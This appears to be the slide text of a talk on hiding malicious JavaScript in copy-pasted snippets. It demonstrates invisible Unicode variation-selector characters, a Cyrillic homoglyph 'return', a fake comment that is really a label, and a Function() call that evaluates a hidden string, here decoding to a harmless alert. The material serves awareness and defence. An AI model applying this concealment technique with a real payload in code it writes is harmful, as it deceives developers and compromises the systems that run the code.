CSP weakness:
it only checks origins, not effects
JavaScript devs that are either amateurs
or pros that don't use it as their main language
Most of JavaScript code running on a project
is not written by its authors:
either dependencies or copy-pasted
Oh, this is simple.
I understand this
I don't understand this,
but it looks important.
Better keep this comment
It is possible to make zero-width characters in Unicode with the Variation Selectors, used to get glyph variants of a preceding character.
Without any preceding character, they are invisible !
Variation Selectors:
FE00 - FE0F
(16 chars, 2 bytes)
UTF-16 surrogates = 16x bigger range of characters !
using a High and a Low surrogate on 4 bytes
Variation Selectors
Supplement:
E0100 - E01EF
(240 chars, 4 bytes)
Codepoint = 10000₁₆ + (H - D800₁₆) × 400₁₆ + (L - DC00₁₆)
\uDB40\uDD61 = 10000 + 340x400 + 161 = E0161
In the Variation Selectors Supplement Block, most are not used yet,
so they are invisible even when combined with previous characters !
Back to our StackOverflow bad guy...
What if we add
syntax highlighting ?
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
What if we add
syntax highlighting ?
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
See, this is not a comment line like the 3 lines before
I put a zero-width Unicode character between those slashes,
and now it is a regular expression !
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
I want to execute malicous code on this line now, but I need to end the RegExp instruction. Here I simply used a semicolon ;
disguised as presentation, but there are many other options...
/󠅡/ + (code)
/󠅡/ - (code)
/󠅡/ * (code)
/󠅡/ [ (code) ]
/󠅡// (code)
some could confuse syntax highlight as well !
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
This looks like the end of the comment on the previous line, but it is actually interpreted as a label, a little known JS feature
This has no other purpose than to confuse you
by imitating a real comment
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
return is a reserved keyword in JavaScript, and cannot be reassigned
At this point, the dev should be convinced this is a harmless comment
Except...
This return used the cyrillic "e", which is indistinguishable from the Latin one.
Different code points = different JS identifiers
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
The same fake return is used here and call this function as a
tagged template literal, another little known JS feature
When faking keywords like return,
this kind of function call is indistinguishable
from regular string manipulation
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
This should bring your attention...
This is a dynamic code evaluation pattern
But to evaluate what code ?
Function("alert('evil')")()
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
escape(f).replace(/u.{8}/g,'')
%uDB40%uDD61 → %u61 = "a"
This is just a basic demonstration